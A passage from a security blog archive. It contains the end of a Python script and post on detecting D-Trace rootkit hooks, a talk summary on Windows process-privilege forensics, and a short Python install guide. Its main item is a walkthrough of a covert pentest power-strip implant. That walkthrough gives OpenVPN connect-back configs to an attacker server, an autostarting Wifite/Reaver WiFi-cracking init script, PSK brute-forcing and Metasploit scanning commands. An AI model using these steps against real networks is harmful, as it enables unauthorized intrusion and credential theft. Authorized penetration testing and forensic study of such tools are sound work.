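        if m:
            name, idx, addr, sym = m.groups()
            table[(name, int(idx))] = (addr.lower(), sym)
    return table


def find_dtrace_hooks(table: Table) -> List[Tuple[str, int, str, str]]:
    """Single-sample check: entries whose handler is the D-Trace systrace stub.
    No 'HOOKED' label is needed when the symbol itself gives the provider away."""
    return sorted(
        (name, idx, addr, sym)
        for (name, idx), (addr, sym) in table.items()
        if sym in DTRACE_HOOK_SYMBOLS
    )


def diff_tables(before: Table, after: Table) -> List[dict]:
    """Before/after comparison, as done with diff(1) in the post: every entry
    whose address or symbol changed, plus entries present in only one sample
    (reported with None on the missing side)."""
    changes: List[dict] = []
    for key in sorted(set(before) | set(after)):
        old: Optional[Entry] = before.get(key)
        new: Optional[Entry] = after.get(key)
        if old != new:
            changes.append({"table": key[0], "index": key[1],
                            "before": old, "after": new})
    return changes


if __name__ == "__main__":
    for name, idx, addr, sym in find_dtrace_hooks(parse_table(AFTER)):
        print(f"D-Trace hook: {name}[{idx}] -> {sym} at {addr}")
    for c in diff_tables(parse_table(BEFORE), parse_table(AFTER)):
        print(f"changed: {c['table']}[{c['index']}] {c['before']} -> {c['after']}")
```
<br />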
<h2>
Conclusion</h2>
The D-Trace rootkit's activities are visible and detectable after all! Instead of collecting before and after samples, we could have spotted the D-Trace syscall directly in the hooked sample, which would have warranted further digging. Nemo's presentation has shown again that well-known tools can be used to subvert a system in ways that are not easy for a novice investigator to spot, but then again nothing can hide in memory ;) [The follow-up to this post, where I talk about detecting more D-Trace providers with a Volatility plugin, is <a href="http://siliconblade.blogspot.com/2013/05/checkdtrace-volatility-plugin-arises.html" target="_blank">here</a>.]<br />
The Analysis of Process Token Privileges (siliconblade, 2013-02-08)<br />
My presentation at the 2012 Open Source Memory Forensics Workshop:<br />
<h2>
Summary</h2>
<br />
Reverse engineering Windows systems nowadays involves looking at static data, such as executables, symbols and PDBs, and/or dynamic data when debugging with a tool like WinDbg. Determining data structures and the meaning of their content has proven to be time consuming, especially when dealing with undocumented objects. This presentation tackles the problem by describing a novel approach, which utilizes the Volatility Framework and F-Response to monitor the changes in a live system's RAM that result from manipulating the targeted structures' content. The technique is used in the discovery of process privileges on Windows operating systems and the development of a new plugin. The presentation also provides examples of how the new plugin is used to discover malicious activity.<br />
<div>
<br />
The <a href="https://code.google.com/p/volatility/source/browse/trunk/volatility/plugins/privileges.py" target="_blank">privileges plugin</a> can be found in the latest version of the Volatility Framework.</div>
<br />
<iframe frameborder="0" height="480" src="http://docs.google.com/gview?a=v&pid=explorer&chrome=false&api=true&embedded=true&srcid=0B6sJr6AdVULGYjZCMUJfcDdqYUk&hl=en" width="100%"></iframe>
Sneaking into networks with the Demyo Power Strip (siliconblade, 2013-02-07)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjufRI9pLRnZu8OxQHlOHNtM5RIksZkM6EDr4sdWUGc1kiGiUknM7uWh8UnqmOWS3njR-DZmpaLSCeIiy2K6iHqDUwawfKf63S3x0lDdN3Ecx0LG2jkBhk2WzCpZgR7LPDzDgL6H1EuJs1u/s1600/Screen+Shot+2013-02-05+at+9.30.09+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjufRI9pLRnZu8OxQHlOHNtM5RIksZkM6EDr4sdWUGc1kiGiUknM7uWh8UnqmOWS3njR-DZmpaLSCeIiy2K6iHqDUwawfKf63S3x0lDdN3Ecx0LG2jkBhk2WzCpZgR7LPDzDgL6H1EuJs1u/s320/Screen+Shot+2013-02-05+at+9.30.09+PM.png" height="248" width="320" /></a></div>
<h2>
<span style="font-family: inherit;">Summary</span></h2>
<div>
<span style="font-family: inherit;">Let's see if this silicon blade is sharp enough to cut through the security cheese! </span><br />
<span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">Some intros: The Demyo Power Strip (DPS) is a covert device built by Demyo Sec for use in penetration tests. While not the first of its kind, it is a strong competitor to existing tools such as </span><a href="http://pwnieexpress.com/products/power-pwn" style="font-family: inherit;" target="_blank">Power Pwn</a><span style="font-family: inherit;"> and <a href="http://theplugbot.com/" target="_blank">the PlugBot</a>. The DPS gives you the ability to launch attacks over Ethernet, WiFi and Bluetooth.</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<h3>
<span style="font-family: inherit;">Features</span></h3>
</div>
<div>
<ul>
<li>Based on Raspberry Pi</li>
<li>CPU 700 MHz, boostable to 1 GHz, 512 MB RAM, 32 GB SD</li>
<li>Ethernet (10/100), WiFi b/g/n and Bluetooth connectivity</li>
<li>Runs Debian Linux</li>
<li>CLI (via SSH) and GUI (via VNC)</li>
<li>Physical dimensions 14″ x 2.25″ x 8.25″ or 35.56cm x 5.72cm x 20.96cm </li>
<li>Actually functions as a real power strip</li>
</ul>
</div>
<br />
<h2>
<span style="font-family: inherit;">
<span style="font-family: inherit;">Default Installed Tools</span></span></h2>
<span style="font-family: inherit;">
Some of the relevant packages installed:</span><br />
<div>
<ul>
<li><span style="font-family: inherit;">Nmap</span></li>
<li><span style="font-family: inherit;">OpenVPN</span></li>
<li><span style="font-family: inherit;">w3af</span></li>
<li><span style="font-family: inherit;">aircrack-ng</span></li>
<li><span style="font-family: inherit;">btscanner</span></li>
<li><span style="font-family: inherit;">ophcrack</span></li>
<li><span style="font-family: inherit;">John the Ripper password cracker</span></li>
<li><span style="font-family: inherit;">and many more...</span></li>
</ul>
<h2>
Getting Ready</h2>
</div>
<h3>
Connecting for the First Time</h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0QllRYgpSkavLM9TpH8E6sUrc7vf8LnlqVAGJP96v6-GwD_0pHTf6Uu2j7JHQGQt-YR2QABAR1he7e6oaM3k545xOn2j9YEA9Ha5rEaFVUGL0UjioFszDKKYFpG3SBEXMIdRhFmQLtfRk/s1600/dps-eth.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0QllRYgpSkavLM9TpH8E6sUrc7vf8LnlqVAGJP96v6-GwD_0pHTf6Uu2j7JHQGQt-YR2QABAR1he7e6oaM3k545xOn2j9YEA9Ha5rEaFVUGL0UjioFszDKKYFpG3SBEXMIdRhFmQLtfRk/s1600/dps-eth.png" height="228" width="320" /></a></div>
<div>
<br /></div>
To set up the DPS, we'll need to hook it up to our network using an Ethernet cable. The DPS will pick up an IP address via DHCP and start listening for SSH connections.<br />
<br />
<h3>
Installing Your Preferred Tools</h3>
<div>
Installing your preferred toolset can be as easy as 1-2-3 thanks to the Debian flavor of Linux running on the DPS. Just run apt-get install for your favorite tool.</div>
<div>
<br /></div>
<h3>
Installing the Metasploit Framework</h3>
<div>
To set up Metasploit you should run the following commands:<br />
<br /></div>
<div>
<ol>
<li>wget http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2</li>
<li>tar -xvvf framework-latest.tar.bz2</li>
<li>apt-get update</li>
<li>apt-get dist-upgrade (can take a bit)</li>
<li>apt-get install postgresql-9.1 postgresql-client-9.1 postgresql-contrib-9.1 postgresql-doc-9.1 postgresql-server-dev-9.1</li>
<li>gem install pg</li>
</ol>
</div>
<h3>
Setting up an OpenVPN Server</h3>
<div>
For the DPS to connect back, I chose the OpenVPN route. You can easily set up an OpenVPN server on Amazon EC2 as described <a href="http://holgr.com/blog/2009/06/setting-up-openvpn-on-amazons-ec2/" target="_blank">here</a> (I used Ubuntu as the server).<br />
<br />
The server setup:<br />
<br />
<pre>port 1194
proto tcp-server
dev tun1
ifconfig 10.4.0.1 10.4.0.2
status server-tcp.log
verb 3
secret ovpn.key
daemon
</pre>
<br />
<h3>
Setting up OpenVPN on the DPS </h3>
</div>
<div>
Now that we have a server to connect back to, let's setup the DPS to auto connect to this server.<br />
<br />
The DPS OpenVPN client configuration:<br />
<br />
<pre>dev tun
proto tcp-client
remote &lt;INSERT IP OR HOSTNAME&gt;
port 1194
ifconfig 10.4.0.2 10.4.0.1
redirect-gateway def1
keepalive 10 60
secret ovpn.key
verb 3
mute 10
</pre>
<br />
To set up auto-connect on boot, simply run "service openvpn start" after adding the key and configuration files.</div>
<h2>
Sneaking In</h2>
<div>
Now all you need to do is walk into the location of interest, plug in the DPS and wait for it to connect back to your OpenVPN server. For the DPS to connect back, you will either need to connect a network cable or let it find an available WiFi access point (AP). If there are no open WiFi APs, we can set up the DPS to brute force the PSK via aircrack-ng. You'll have to take a lengthy break in this scenario because the cracking may take a while to succeed.<br />
<br />
<h3>
w00t w00t! Seeing the DPS Connect</h3>
You can run netstat to find an established connection or look at /var/log/syslog to track the OpenVPN logs. Due to our simple OpenVPN setup, the DPS will be at 10.4.0.2. Now we can SSH into it and go to town!<br />
<br />
<h3>
Automating WEP/WPA/WPS cracking with <a href="http://code.google.com/p/wifite/" target="_blank">Wifite</a> and <a href="http://code.google.com/p/reaver-wps/" target="_blank">Reaver</a></h3>
<div>
Installing the tools:</div>
<div>
<br />
<ol>
<li>wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py && chmod +x wifite.py</li>
<li>wget http://static.hackersgarage.com/darkc0de.lst.gz && gunzip darkc0de.lst.gz</li>
<li>sudo apt-get install sqlite3 libsqlite3-dev gcc-4.7</li>
<li>svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only</li>
<li>cd reaver-wps-read-only && ./configure && make && make install</li>
</ol>
<div>
Wifite comes with Reaver/WPS integration so all you have to do is run Wifite as:</div>
<div>
<ul>
<li>./wifite.py -all</li>
</ul>
<div>
This will make Wifite perform all three types of attacks (WEP/WPA/WPS).</div>
</div>
<div>
<br /></div>
<div>
You can also configure Wifite to start on boot as a service by doing the following:</div>
<div>
<ol>
<li>nano /etc/init.d/wcracker</li>
<li>Add the following code:</li>
<pre>### BEGIN INIT INFO
# Provides: Wcracker Service
# Required-Start: $local_fs $network $remote_fs $syslog
# Required-Stop: $local_fs $network $remote_fs $syslog
# Default-Start:
# Default-Stop:
# X-Interactive: true
# Short-Description: Start/stop Wcracker Service
### END INIT INFO
export USER='root'
eval cd ~$USER
case "$1" in
start)
# Start the wifi cracker
su $USER -c '/root/wifite.py -all -dict /root/darkc0de.lst'
echo "Starting wireless cracking for $USER "
;;
stop)
# if it's stop, then just kill the process
pkill wifite.py
echo "wireless cracking stopped"
;;
*)
echo "Usage: /etc/init.d/wcracker {start|stop}"
exit 1
;;
esac
exit 0
</pre>
<li>update-rc.d wcracker defaults</li>
<li>And reboot</li>
</ol>
<span style="font-family: Arial, Helvetica, sans-serif;">Wifite saves the cracked passwords in the file cracked.txt. </span>You can further automate the process by building a script that checks the cracked.txt file and logs into the cracked network for a connect back, but this is a bit out of scope at the moment (maybe in a separate post).</div>
</div>
<br />
<h3>
Some Snooping Around with Metasploit</h3>
<div>
Create a database (e.g. msf) in your Postgres installation, then launch Metasploit to connect to it and populate the database and module cache.</div>
<div>
cd msf3</div>
<div>
./msfconsole</div>
<div>
<div>
msf > db_connect postgres:password@localhost/msf<br />
<br />
You can scan the environment for potential targets using modules such as auxiliary/scanner/smb/smb_version, or build a database of targets with nmap and launch attacks from there.<br />
<br />
msf > db_nmap -v -sV 192.168.1.0/24<br />
<br />
The command above builds a database of the scanned network that can be used later on.<br />
<br />
To get more in-depth information about how to use Metasploit you can visit the Offensive Security <a href="http://www.offensive-security.com/metasploit-unleashed/Introduction" target="_blank">web site</a>. </div>
<div>
<br /></div>
</div>
<h2>
Conclusion</h2>
<div>
Overall, the DPS appears to be a decent covert platform for performing penetration tests. It doesn't physically appear as suspicious as other similar devices, especially with an Ethernet cable sticking out. The OS is flexible enough to rapidly install or compile non-default tools. It would be great if it had a 3G modem, and I heard from Demyo Sec that one will be present in the next release.<br />
<br />
Can you build this device yourself and spend countless hours soldering and testing? Maybe... OR you can dish out $750 and be on your way to pen tester stardom!<br />
<br />
You can get more information from Demyo Sec's <a href="http://www.demyo.com/products/demyo-power-strip/" target="_blank">web site</a>.<br />
<br /></div>
<h4>
Disclaimer</h4>
</div>
<div>
The material and actions described here are for educational purposes only. </div>
Setting up for Data Analysis with Python (siliconblade, 2012-11-06)<h3>
<span style="font-family: Arial, Helvetica, sans-serif;">How to install numpy, scipy, pandas, matplotlib, IPython on OS X Mountain Lion:</span></h3>
<ol>
<li><span style="font-family: Arial, Helvetica, sans-serif;">install Xcode and associated Command Line Tools from <a href="http://developer.apple.com/">http://developer.apple.com</a></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">easy_install pip</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">pip install numpy</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">download and install gfortran binaries from <a href="http://r.research.att.com/tools/">http://r.research.att.com/tools/</a></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">pip install scipy</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">pip install pandas</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">download and install freetype from <a href="http://sourceforge.net/projects/freetype/files/">http://sourceforge.net/projects/freetype/files/</a></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">run ln -s /usr/local/include/freetype2/freetype/ /usr/include/freetype</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">download and install libpng from <a href="http://sourceforge.net/projects/libpng/files/">http://sourceforge.net/projects/libpng/files/</a></span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">pip install matplotlib</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">pip install IPython</span></li>
</ol>
<br />